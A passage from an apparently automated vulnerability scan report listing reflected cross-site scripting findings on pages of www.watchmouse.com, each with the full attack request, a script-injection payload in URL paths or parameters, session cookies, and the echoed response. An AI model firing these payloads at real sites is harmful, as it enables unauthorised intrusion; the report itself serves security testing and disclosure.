This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en11bc5"><script>alert(1)</script>0030cd96bc9/checkit.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d014d22cc44f7c6df17d734e8e868497"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en11bc5"><script>alert(1)</script>0030cd96bc9/checkit.php" method="post">
...[SNIP]...

1.88. http://www.watchmouse.com/en/checkit.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/checkit.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 230e8"><script>alert(1)</script>4a288135e9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/checkit.php230e8"><script>alert(1)</script>4a288135e9d HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-67efcefa0450e20e44c2f55c3c40a0ec"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/checkit.php230e8"><script>alert(1)</script>4a288135e9d" method="post">
...[SNIP]...

1.89. http://www.watchmouse.com/en/checkit.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/checkit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a2a"><script>alert(1)</script>a6122662567 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/checkit.php?72a2a"><script>alert(1)</script>a6122662567=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 12:07:11 GMT
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: nkey=deleted; expires=Tue, 09-Feb-2010 12:07:10 GMT; path=/; domain=.watchmouse.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/checkit.php?72a2a"><script>alert(1)</script>a6122662567=1" method="post">
...[SNIP]...

1.90. http://www.watchmouse.com/en/compare_plans.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/compare_plans.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e73e"><script>alert(1)</script>35ba5ba3a10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en4e73e"><script>alert(1)</script>35ba5ba3a10/compare_plans.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:51 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-0bd773010b5077b12c865fd29ccd88d8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en4e73e"><script>alert(1)</script>35ba5ba3a10/compare_plans.php" method="post">
...[SNIP]...

1.91. http://www.watchmouse.com/en/compare_plans.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/compare_plans.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e340"><script>alert(1)</script>9221b0de922 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/compare_plans.php6e340"><script>alert(1)</script>9221b0de922 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b91f20af3fe8132dbe91642df473a9d9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/compare_plans.php6e340"><script>alert(1)</script>9221b0de922" method="post">
...[SNIP]...

1.92. http://www.watchmouse.com/en/compare_plans.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/compare_plans.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bf72"><script>alert(1)</script>669a34a531f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/compare_plans.php?9bf72"><script>alert(1)</script>669a34a531f=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:49 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-dc30a3cc8f1a54fa30620834f64e7144"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/compare_plans.php?9bf72"><script>alert(1)</script>669a34a531f=1" method="post">
...[SNIP]...

1.93. http://www.watchmouse.com/en/compare_plans.php [vpackid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/compare_plans.php

Issue detail

The value of the vpackid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99432"><script>alert(1)</script>ae1d7b19b4f was submitted in the vpackid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/compare_plans.php?vpackid=3599432"><script>alert(1)</script>ae1d7b19b4f HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-bce360f73e4c99d9dd54b17508033d43"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/compare_plans.php?vpackid=3599432"><script>alert(1)</script>ae1d7b19b4f" method="post">
...[SNIP]...

1.94. http://www.watchmouse.com/en/contact.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/contact.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517df"><script>alert(1)</script>9aa81fe30a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en517df"><script>alert(1)</script>9aa81fe30a4/contact.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-948f2a7f2cb3d3f5350da831684188af"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en517df"><script>alert(1)</script>9aa81fe30a4/contact.php" method="post">
...[SNIP]...

1.95. http://www.watchmouse.com/en/contact.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/contact.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dece"><script>alert(1)</script>e746a2f3c3e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact.php3dece"><script>alert(1)</script>e746a2f3c3e HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-25bd6165334a4fb8c20d0d187d750dc7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/contact.php3dece"><script>alert(1)</script>e746a2f3c3e" method="post">
...[SNIP]...

1.96. http://www.watchmouse.com/en/contact.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/contact.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a050"><script>alert(1)</script>2b2742388bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact.php?6a050"><script>alert(1)</script>2b2742388bf=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:21 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a9c0a450dd6dd958560f3669bbe01d89"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/contact.php?6a050"><script>alert(1)</script>2b2742388bf=1" method="post">
...[SNIP]...

1.97. http://www.watchmouse.com/en/current_partners.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/current_partners.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42f15"><script>alert(1)</script>5ad96335c0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en42f15"><script>alert(1)</script>5ad96335c0e/current_partners.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2144e3f2f97e0de65099ddb3a56c8736"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en42f15"><script>alert(1)</script>5ad96335c0e/current_partners.php" method="post">
...[SNIP]...

1.98. http://www.watchmouse.com/en/current_partners.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/current_partners.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6bc2"><script>alert(1)</script>81608cc8e78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/current_partners.phpb6bc2"><script>alert(1)</script>81608cc8e78 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-22c4668430472ca477ec8d7df0ad1c9c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/current_partners.phpb6bc2"><script>alert(1)</script>81608cc8e78" method="post">
...[SNIP]...

1.99. http://www.watchmouse.com/en/current_partners.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/current_partners.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 695a3"><script>alert(1)</script>4b0a60696ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/current_partners.php?695a3"><script>alert(1)</script>4b0a60696ee=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:27 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5b3a837ac4107dd50eab95adaa88f027"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/current_partners.php?695a3"><script>alert(1)</script>4b0a60696ee=1" method="post">
...[SNIP]...

1.100. http://www.watchmouse.com/en/customers.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/customers.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ea8"><script>alert(1)</script>c346d5181b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en57ea8"><script>alert(1)</script>c346d5181b0/customers.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f08f3cbfe2000a2d1f33ad024175cf57"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en57ea8"><script>alert(1)</script>c346d5181b0/customers.php" method="post">
...[SNIP]...

1.101. http://www.watchmouse.com/en/customers.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/customers.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ddd0"><script>alert(1)</script>ed307c79623 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/customers.php7ddd0"><script>alert(1)</script>ed307c79623 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
